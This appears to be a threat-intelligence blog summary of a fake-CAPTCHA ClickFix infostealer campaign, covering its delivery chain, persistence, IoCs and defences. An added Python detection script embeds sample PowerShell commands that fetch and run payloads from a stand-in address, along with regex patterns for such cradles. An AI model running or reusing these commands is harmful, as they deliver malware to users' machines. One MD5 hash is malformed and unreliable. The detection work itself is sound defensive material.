Fake CAPTCHA ClickFix Campaign Uncovered: Cybercriminals Deploy In-Memory Infostealer via PowerShell and Process Injection

A recent targeted campaign leveraging fake CAPTCHA pages—part of the broader ClickFix social engineering technique—was investigated by CyberProof’s MDR and Threat Hunting teams. This campaign delivers an infostealer malware that performs extensive credential harvesting and is notable for its multi-stage delivery chain and advanced evasion behavior. The attack displays strong similarities to earlier ClickFix campaigns seen in 2025 that abused fake CAPTCHAs as an initial access vector.
1. Attack Chain Overview

1.1 Initial Access

  • The campaign begins when a user visits a compromised website hosting a deceptive CAPTCHA page designed to mimic legitimate human-verification services.
  • These fake challenges convince the victim to interact with a lookalike web page, triggering a malicious PowerShell command execution.

1.2 Execution & Payload Delivery

  • User executes a PowerShell command (often by copying from the fake CAPTCHA page and pasting into the Windows Run dialog).
  • The initial PowerShell script reaches out to attacker-controlled infrastructure (e.g., IP 91.92.240[.]219) to download a binary (cptch.bin).
  • The downloaded binary is a position-independent shellcode produced with the Donut tool, enabling a .NET assembly or executable to run directly in memory without touching disk.

1.3 In-Memory Loader & Process Injection

  • After downloading, the shellcode allocates memory and performs process injection into a legitimate system process such as svchost.exe.
  • Because execution stays in memory, the malicious activity is hidden from many file-based defenses.
  • The injected code then loads further payloads or modules that carry out credential harvesting and system profiling.

1.4 Targeted Data & Reconnaissance

Once running in memory, the malware is configured to target a broad set of sensitive data and applications:

  • Browser credentials across ~25 browsers (Chrome, Edge, Brave, Opera, Tor, etc.)
  • VPN configurations (e.g., NordVPN, Mullvad, OpenVPN)
  • Cryptocurrency wallets (e.g., MetaMask, Exodus, Electrum)
  • Gaming platforms and other apps

These targets are selected to maximize credential stealing and system compromise value.

2. Persistence Mechanisms

  • An unusual persistence method involves altering the RUNMRU registry key, which causes PowerShell to re-execute the original download command on reboot.
  • This is effective because the RUNMRU key tracks past Run dialog entries, and abuse of this mechanism ensures automatic reinfection.

3. Evasion and Anti-Detection

Key strategies used to evade detection include:

  • In-memory execution: Using shellcode loaded via Donut to avoid disk artifacts.
  • Process injection: Malicious code runs inside svchost.exe, blending with benign system processes.
  • Remote payload hosting: Different payload binaries hosted under attacker-controlled IPs to avoid signature-based detection.

4. Indicators of Compromise (IoCs)

CyberProof identified several IoCs that defenders can use:

IP Addresses

  • 91.92.240[.]219
  • 94.154.35[.]115
  • 178.16.53[.]70

Domain

  • pinmaha[.]com

Hashes (MD5)

  • fe4a3fb1a48bbdea986e05d1459f925e
  • f50846dcf09c0ebf99bb128eb3f28c1db
  • a3cff7d2ef600d58bca156de0b299d88

5. Defensive Recommendations

To protect against this type of attack:

5.1 Endpoint & Execution Controls

  • Group Policy Restrictions: Disable Run dialog access (Win+R) or remove it from the Start Menu to prevent user-initiated malicious command execution.
  • App Control Policies: Block unauthorized PowerShell execution, especially when initiated from user contexts.
  • Script Execution Policies: Configure PowerShell to only allow signed scripts (AllSigned or RemoteSigned).

5.2 Detection & Logging

  • Enable Script Block Logging in PowerShell to capture malicious scripts for audit and investigation.
  • Behavioral Alerts: Monitor for unusual API calls (e.g., CClipDataObject::GetData) associated with clipboard abuse.
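As an added illustration of the logging and alerting advice above (example code written for this summary, not CyberProof's detection content), the following Python triage script runs simple ClickFix-style rules over constructed telemetry: PowerShell script-block records (Event ID 4104) are checked for a download cradle combined with window-hiding or policy-bypass flags, and Run-dialog history (RunMRU) registry writes are checked for an interpreter invoking a remote download. The event shape, the 203.0.113.10 address and the hit names are assumptions for the example.

```python
import re

# Constructed sample telemetry (not from the report): two script-block records,
# one RunMRU registry write with a download cradle, and one benign RunMRU entry.
SAMPLE_EVENTS = [
    {"kind": "scriptblock", "text":
     "powershell -w hidden -ep bypass -c \"iwr http://203.0.113.10/cptch.bin -OutFile $env:TEMP\\c.bin\""},
    {"kind": "scriptblock", "text": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"kind": "registry", "value": "a",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
     "data": "powershell -w hidden -c \"irm http://203.0.113.10/x | iex\"\\1"},
    {"kind": "registry", "value": "b",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
     "data": "notepad.exe\\1"},
]

# Download cradle: a fetch verb followed later in the same block by a URL.
CRADLE = re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|"
                    r"DownloadFile|Net\.WebClient|Start-BitsTransfer|curl|wget)\b.*https?://", re.I)
# Flags that hide the console window or disable PowerShell safeguards.
EVASION = re.compile(r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile\b|"
                     r"(?:ep|ex|executionpolicy)\s+bypass|enc(?:odedcommand)?\b)", re.I)
IN_MEMORY = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
INTERPRETER = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)\b", re.I)


def analyze(events):
    """Return (rule, severity, excerpt) findings for ClickFix-style activity."""
    findings = []
    for ev in events:
        if ev["kind"] == "scriptblock":
            text = ev["text"]
            cradle = CRADLE.search(text)
            if cradle and (EVASION.search(text) or IN_MEMORY.search(text)):
                findings.append(("ps_download_cradle_evasive", "high", text[:80]))
            elif cradle:
                findings.append(("ps_download_cradle", "medium", text[:80]))
        elif ev["kind"] == "registry" and ev["key"].lower().endswith(r"\explorer\runmru"):
            data = ev["data"]  # Run-dialog history: interpreter plus download = persistence/reinfection risk
            if INTERPRETER.search(data) and (CRADLE.search(data) or IN_MEMORY.search(data)):
                findings.append(("runmru_interpreter_download", "high", f'{ev["value"]}={data[:80]}'))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

Feed it exported 4104 ScriptBlockText values and Sysmon Event ID 13 (registry value set) records for the RunMRU key to reproduce the checks on real data; tune the regexes to your environment's legitimate admin scripts before alerting.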

5.3 User Awareness

  • Train users to recognize social engineering cues, especially fake CAPTCHAs that ask them to copy/paste commands into system dialogs.

Wrap-Up

The CyberProof report reinforces that the ClickFix social engineering vector remains a high-risk threat. The combination of deceptive UX (fake CAPTCHA), memory-only execution, credential harvesting breadth, and persistence via the RUNMRU registry makes this campaign particularly notable. Security teams should treat fake CAPTCHA-style social engineering not as a minor nuisance but as a credible initial compromise channel that can bypass traditional signature-based defenses.